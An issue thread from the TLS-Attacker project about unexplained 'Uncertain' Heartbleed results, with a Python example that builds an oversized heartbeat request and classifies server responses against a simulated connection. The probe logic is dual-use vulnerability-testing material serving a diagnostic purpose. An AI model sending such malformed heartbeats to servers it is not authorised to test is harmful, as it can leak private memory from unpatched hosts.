tls-attacker / TLS-Attacker

TLS-Attacker is a Java-based framework for analyzing TLS libraries. It can be used to manually test TLS clients and servers or as a software library for more advanced tools.
Apache License 2.0

Vulnerable: Uncertain should offer more explanation about the Why #90

Closed florianrein closed 2 years ago

florianrein commented 3 years ago

Hello tls-attacker team, in a recent evaluation run, we got the following result for a heartbleed check as the last line in the log file:

Vulnerable: Uncertain

The remaining log file did not contain any hints about why it could not be determined whether the server is affected. We ran the experiment with debug logs on, but still no hints on the uncertainty. This left us a little... uncertain... how to handle the case. :-)

tls-attacker should print a few explanatory sentences about why it could not be determined whether the target server is affected or not, after printing the result as seen above.

ic0ns commented 3 years ago

Hey, for the heartbleed vulnerability, uncertain means that TLS-Attacker wasn't even able to finish the handshake with the server and send the heartbeat messages to test for heartbleed. But you are correct, we should add a sentence or two explaining the situation.
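To make the three-way outcome described in this reply concrete, here is an added Python example. It is not code from TLS-Attacker or TLS-Scanner; it models the Heartbleed check as a tri-state verdict that carries its reason, so "Uncertain" is reported together with the handshake failure that caused it. The heartbeat record layout follows RFC 6520 (content type 24, message type 1 = request, 2 = response, 16-bit payload_length, at least 16 bytes of padding). The `FakeConn` class and its `mode` values are a constructed stand-in for a real TLS connection so the example runs offline; the real tools do this over an actual TLS handshake.

```python
import struct
from dataclasses import dataclass
from enum import Enum

HEARTBEAT = 24      # TLS content type for heartbeat records (RFC 6520)
ALERT = 21          # TLS content type for alert records
TLS12 = 0x0303
PADDING = 16        # RFC 6520 minimum padding
REAL_PAYLOAD = b"A"  # the single byte of payload we actually send


class Result(Enum):
    VULNERABLE = "Vulnerable: True"
    NOT_VULNERABLE = "Vulnerable: False"
    UNCERTAIN = "Vulnerable: Uncertain"


@dataclass
class Verdict:
    result: Result
    reason: str   # always filled in, so an Uncertain result explains itself


class HandshakeError(Exception):
    """Raised by the (constructed) connection when the TLS handshake fails."""


def build_heartbeat_request(claimed_len: int) -> bytes:
    """Heartbeat request whose payload_length field overstates the real payload."""
    body = struct.pack("!BH", 1, claimed_len) + REAL_PAYLOAD + b"\x00" * PADDING
    return struct.pack("!BHH", HEARTBEAT, TLS12, len(body)) + body


def parse_record(data: bytes):
    """Split a TLS record into (content_type, version, body); None if truncated."""
    if len(data) < 5:
        return None
    ctype, ver, length = struct.unpack("!BHH", data[:5])
    if len(data) < 5 + length:
        return None
    return ctype, ver, data[5:5 + length]


def check_heartbleed(conn, claimed_len: int = 0x4000) -> Verdict:
    # Step 1: the heartbeat can only be sent on an established session. If the
    # handshake fails we have learned nothing about the heartbeat code path.
    try:
        conn.handshake()
    except HandshakeError as e:
        return Verdict(Result.UNCERTAIN,
                       f"handshake did not complete, heartbeat never sent ({e})")
    # Step 2: send the malformed request and classify whatever comes back.
    conn.send(build_heartbeat_request(claimed_len))
    resp = conn.recv()
    if not resp:
        return Verdict(Result.NOT_VULNERABLE,
                       "no heartbeat response (server discarded the request or closed)")
    rec = parse_record(resp)
    if rec is None:
        return Verdict(Result.UNCERTAIN, "truncated or malformed TLS record in response")
    ctype, _, body = rec
    if ctype == ALERT:
        return Verdict(Result.NOT_VULNERABLE, "server answered with a TLS alert")
    if ctype == HEARTBEAT and len(body) >= 3:
        hb_type, plen = struct.unpack("!BH", body[:3])
        echoed = len(body) - 3 - PADDING
        if hb_type == 2 and echoed > len(REAL_PAYLOAD):
            return Verdict(Result.VULNERABLE,
                           f"server echoed {echoed} bytes for a {len(REAL_PAYLOAD)}-byte payload "
                           f"(claimed {claimed_len}, response payload_length {plen})")
        return Verdict(Result.NOT_VULNERABLE,
                       "heartbeat response bounded to the real payload length")
    return Verdict(Result.UNCERTAIN, f"unexpected record type {ctype} in response")


class FakeConn:
    """Constructed stand-in for a TLS connection; 'mode' selects the server's behaviour."""

    def __init__(self, mode: str):
        self.mode = mode
        self.sent = b""

    def handshake(self):
        if self.mode == "handshake_fails":
            raise HandshakeError("no cipher suite overlap (constructed)")

    def send(self, data: bytes):
        self.sent = data

    def recv(self) -> bytes:
        if self.mode == "vulnerable":
            # Trusts payload_length and copies that many bytes out of memory.
            _, _, body = parse_record(self.sent)
            _, plen = struct.unpack("!BH", body[:3])
            rbody = struct.pack("!BH", 2, plen) + b"L" * plen + b"\x00" * PADDING
            return struct.pack("!BHH", HEARTBEAT, TLS12, len(rbody)) + rbody
        if self.mode == "alert":
            return struct.pack("!BHH", ALERT, TLS12, 2) + b"\x02\x0a"  # fatal unexpected_message
        return b""  # "patched": silently discards the request, as RFC 6520 requires


if __name__ == "__main__":
    for mode in ("handshake_fails", "vulnerable", "alert", "patched"):
        v = check_heartbleed(FakeConn(mode))
        print(f"{mode:16} {v.result.value}  ({v.reason})")
```

The design point is that `Verdict` never carries a bare `Uncertain`: every early exit names what was observed, which is exactly the information missing from the log described in this issue.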

ic0ns commented 2 years ago

We moved the heartbleed scans (and in fact all scans) to TLS-Scanner (https://github.com/tls-attacker/TLS-Scanner), where we have more fine-grained control over the response from the test. Our next version (TLS-Scanner 4.3.0) can completely explain itself. Sadly this feature didn't make it into 4.2.0. Closing this here.